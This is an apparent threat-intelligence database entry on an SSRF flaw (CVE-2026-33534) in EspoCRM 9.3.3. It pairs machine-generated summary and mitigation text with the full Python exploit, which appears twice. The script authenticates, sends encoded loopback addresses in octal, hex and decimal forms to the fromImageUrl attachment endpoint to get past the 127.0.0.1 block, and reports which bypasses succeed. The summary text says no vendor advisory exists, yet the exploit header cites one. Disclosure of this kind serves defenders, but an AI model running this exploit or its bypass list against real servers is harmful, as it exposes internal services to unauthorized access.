EspoCRM 9.3.3 - SSRF
EspoCRM version 9. 3. 3 is affected by a Server-Side Request Forgery (SSRF) vulnerability identified as CVE-2026-33534. This vulnerability allows an attacker to induce the server to make HTTP requests to arbitrary domains. Exploit code is publicly available in Python. No official patch or vendor advisory is currently provided, and no known exploits in the wild have been reported. The severity of this vulnerability is assessed as medium based on available information.
AI Analysis
Technical Summary
CVE-2026-33534 is an SSRF vulnerability affecting EspoCRM 9.3.3 running on Debian/Kali with Apache and PHP. SSRF vulnerabilities enable attackers to make the server perform unauthorized HTTP requests, potentially accessing internal resources or services. The exploit code is available in Python, indicating proof-of-concept or exploit development. There is no vendor advisory or patch link provided, so the patch status is unknown.
Potential Impact
An attacker exploiting this SSRF vulnerability could cause the EspoCRM server to send crafted HTTP requests to internal or external systems. This may lead to unauthorized information disclosure or interaction with internal services not otherwise accessible. No direct evidence of exploitation in the wild is reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a patch or official fix is released, consider restricting outbound HTTP requests from the EspoCRM server and monitoring for unusual network activity related to the application.
Indicators of Compromise
- exploit-code: # Exploit Title: EspoCRM 9.3.3 - Authenticated SSRF via Alternative IPv4 Notation # Google Dork: N/A # Date: 2026-05-08 # Exploit Author: Max Gabriel (https://github.com/EntroVyx) # Vendor Homepage: https://www.espocrm.com/ # Software Link: https://github.com/espocrm/espocrm/releases/tag/9.3.3 # Version: 9.3.3 # Tested on: EspoCRM 9.3.3, Debian/Kali, Apache/PHP # CVE : CVE-2026-33534 # Advisory: https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73 # # Usage: # python3 CVE-2026-33534.py -u http://127.0.0.1:8083 -U admin -P 'Admin12345!' --internal-port 8083 --cleanup # python3 CVE-2026-33534.py -u https://target.example -U user -P pass --internal-port 9002 --internal-path /interno.png # python3 CVE-2026-33534.py -u https://target.example -U user -P pass --payload 0x7f000001 --payload 2130706433 import argparse import json import sys from pathlib import Path from urllib.parse import urlparse, urlunparse import requests DEFAULT_LOOPBACK_PAYLOADS = [ ("octal dotted", "0177.0.0.1"), ("octal dotted padded", "0177.0000.0000.0001"), ("octal compressed", "0177.1"), ("hex dotted", "0x7f.0.0.1"), ("hex dotted full", "0x7f.0x0.0x0.0x1"), ("hex dword", "0x7f000001"), ("decimal dword", "2130706433"), ("octal dword", "017700000001"), ("short IPv4 two-part", "127.1"), ("short IPv4 three-part", "127.0.1"), ("zero-padded dotted", "127.000.000.001"), ("long zero-padded octal", "0000000000000000000000000177.0.0.1"), ] def normalize_base_url(value): value = value.rstrip("/") parsed = urlparse(value) if not parsed.scheme or not parsed.netloc: raise argparse.ArgumentTypeError("target URL must include scheme and host") return value def default_internal_port(base_url): parsed = urlparse(base_url) if parsed.port: return parsed.port return 443 if parsed.scheme == "https" else 80 def ensure_path(value): if not value: return "/" return value if value.startswith("/") else f"/{value}" def make_url(base_url, host, internal_port, internal_path): parsed = urlparse(base_url) netloc = host default_port = 443 if parsed.scheme == "https" else 80 if internal_port != default_port: netloc = f"{host}:{internal_port}" return urlunparse((parsed.scheme, netloc, ensure_path(internal_path), "", "", "")) def make_control_url(base_url, internal_port, internal_path): return make_url(base_url, "127.0.0.1", internal_port, internal_path) def load_payloads(args): payloads = list(DEFAULT_LOOPBACK_PAYLOADS) if args.no_default_payloads: payloads = [] for item in args.payload or []: payloads.append(("custom", item.strip())) if args.payload_file: for line_number, raw_line in enumerate(Path(args.payload_file).read_text().splitlines(), start=1): line = raw_line.strip() if not line or line.startswith("#"): continue if "=" in line: label, host = line.split("=", 1) payloads.append((label.strip() or f"file:{line_number}", host.strip())) else: payloads.append((f"file:{line_number}", line)) seen = set() output = [] for label, host in payloads: if not host or host in seen: continue seen.add(host) output.append((label, host)) return output def post_from_image_url(session, base_url, image_url, field, parent_type, parent_id, timeout): endpoint = f"{base_url}/api/v1/Attachment/fromImageUrl" payload = { "url": image_url, "field": field, "parentType": parent_type, } if parent_id: payload["parentId"] = parent_id return session.post(endpoint, json=payload, timeout=timeout) def parse_json(response): try: return response.json() except json.JSONDecodeError: return None def short_body(response): body = response.text.replace("\r", "\\r").replace("\n", "\\n") if len(body) > 420: return body[:420] + "..." return body def delete_attachment(session, base_url, attachment_id, timeout): response = session.delete(f"{base_url}/api/v1/Attachment/{attachment_id}", timeout=timeout) return response.status_code in {200, 204} def is_successful_bypass(response): data = parse_json(response) return ( response.status_code == 200 and isinstance(data, dict) and bool(data.get("id")) ), data def print_result(label, host, response, data): if isinstance(data, dict) and data.get("id"): print( f"[+] {label:24} {host:38} HTTP {response.status_code} " f"id={data.get('id')} type={data.get('type')} size={data.get('size')}" ) return reason = response.headers.get("X-Status-Reason") or short_body(response) or "-" print(f"[-] {label:24} {host:38} HTTP {response.status_code} {reason}") def main(): parser = argparse.ArgumentParser( description="Authenticated EspoCRM CVE-2026-33534 SSRF verification exploit with multiple encoded loopback payloads." ) parser.add_argument("-u", "--url", required=True, type=normalize_base_url, help="Base URL, e.g. http://host:8083") parser.add_argument("-U", "--username", required=True, help="EspoCRM username") parser.add_argument("-P", "--password", required=True, help="EspoCRM password") parser.add_argument("--internal-port", type=int, help="Internal loopback port for the self-fetch PoC") parser.add_argument("--internal-path", default="/client/img/logo-light.svg", help="Internal path for the self-fetch PoC") parser.add_argument("--payload", action="append", help="Additional loopback host notation to test, e.g. 0x7f000001") parser.add_argument("--payload-file", help="File with one host payload per line, or label=host") parser.add_argument("--no-default-payloads", action="store_true", help="Use only --payload/--payload-file entries") parser.add_argument("--field", default="avatar", help="Attachment field used by fromImageUrl") parser.add_argument("--parent-type", default="User", help="Parent entity type used by fromImageUrl") parser.add_argument("--parent-id", help="Optional parent entity id") parser.add_argument("--timeout", type=float, default=15.0, help="HTTP timeout") parser.add_argument("--cleanup", action="store_true", help="Attempt to delete attachments created by successful payloads") parser.add_argument("--stop-on-first", action="store_true", help="Stop after the first successful payload") parser.add_argument("--insecure", action="store_true", help="Disable TLS certificate verification") args = parser.parse_args() payloads = load_payloads(args) if not payloads: print("[-] No payloads to test.") return 2 internal_port = args.internal_port or default_internal_port(args.url) control_url = make_control_url(args.url, internal_port, args.internal_path) session = requests.Session() session.auth = (args.username, args.password) session.headers.update({"Accept": "application/json"}) session.verify = not args.insecure print(f"[*] Target: {args.url}") print(f"[*] Control URL: {control_url}") print(f"[*] Payload count: {len(payloads)}") control = post_from_image_url( session, args.url, control_url, args.field, args.parent_type, args.parent_id, args.timeout, ) print(f"[*] Control response: HTTP {control.status_code} {control.headers.get('X-Status-Reason') or short_body(control) or '-'}") if control.status_code != 403: print("[!] The direct 127.0.0.1 control was not blocked with HTTP 403. Results may not prove CVE-2026-33534.") successes = [] for label, host in payloads: ssrf_url = make_url(args.url, host, internal_port, args.internal_path) response = post_from_image_url( session, args.url, ssrf_url, args.field, args.parent_type, args.parent_id, args.timeout, ) successful, data = is_successful_bypass(response) print_result(label, host, response, data) if successful: successes.append((label, host, ssrf_url, data)) if args.cleanup and data.get("id"): if delete_attachment(session, args.url, data["id"], args.timeout): print(f" cleanup: deleted attachment {data['id']}") else: print(f" cleanup: failed to delete attachment {data['id']}") if args.stop_on_first: break if not successes: print("[-] No encoded loopback payload produced an attachment.") return 2 print("") print("[+] Vulnerable behavior confirmed.") print(f"[+] Direct loopback control: HTTP {control.status_code}") print(f"[+] Successful payloads: {len(successes)}") for label, host, ssrf_url, data in successes: print(f" - {label}: {host} -> {data.get('type')} ({ssrf_url})") return 0 if control.status_code == 403 else 1 if __name__ == "__main__": try: sys.exit(main()) except requests.RequestException as exc: print(f"[-] HTTP error: {exc}") sys.exit(1)
EspoCRM 9.3.3 - SSRF
Description
EspoCRM version 9. 3. 3 is affected by a Server-Side Request Forgery (SSRF) vulnerability identified as CVE-2026-33534. This vulnerability allows an attacker to induce the server to make HTTP requests to arbitrary domains. Exploit code is publicly available in Python. No official patch or vendor advisory is currently provided, and no known exploits in the wild have been reported. The severity of this vulnerability is assessed as medium based on available information.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
CVE-2026-33534 is an SSRF vulnerability affecting EspoCRM 9.3.3 running on Debian/Kali with Apache and PHP. SSRF vulnerabilities enable attackers to make the server perform unauthorized HTTP requests, potentially accessing internal resources or services. The exploit code is available in Python, indicating proof-of-concept or exploit development. There is no vendor advisory or patch link provided, so the patch status is unknown.
Potential Impact
An attacker exploiting this SSRF vulnerability could cause the EspoCRM server to send crafted HTTP requests to internal or external systems. This may lead to unauthorized information disclosure or interaction with internal services not otherwise accessible. No direct evidence of exploitation in the wild is reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a patch or official fix is released, consider restricting outbound HTTP requests from the EspoCRM server and monitoring for unusual network activity related to the application.
Technical Details
- Cve
- CVE-2026-33534
- Version
- 9.3.3
- Vendor
- https://www.espocrm.com
- Application
- https://github.com/espocrm/espocrm/releases/tag/9.3.3
- Author
- Max Gabriel
- Platform
- EspoCRM 9.3.3, Debian/Kali, Apache/PHP
- Edb Id
- 52583
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for EspoCRM 9.3.3 - SSRF
# Exploit Title: EspoCRM 9.3.3 - Authenticated SSRF via Alternative IPv4 Notation # Google Dork: N/A # Date: 2026-05-08 # Exploit Author: Max Gabriel (https://github.com/EntroVyx) # Vendor Homepage: https://www.espocrm.com/ # Software Link: https://github.com/espocrm/espocrm/releases/tag/9.3.3 # Version: 9.3.3 # Tested on: EspoCRM 9.3.3, Debian/Kali, Apache/PHP # CVE : CVE-2026-33534 # Advisory: https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73 # # Usage: # python3 CVE... (8889 more characters)
Threat ID: 6a1769c5e29bf47b50f43b9f
Added to database: 5/27/2026, 10:01:41 PM
Last enriched: 5/27/2026, 10:01:53 PM
Last updated: 5/27/2026, 11:06:18 PM
Views: 2
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.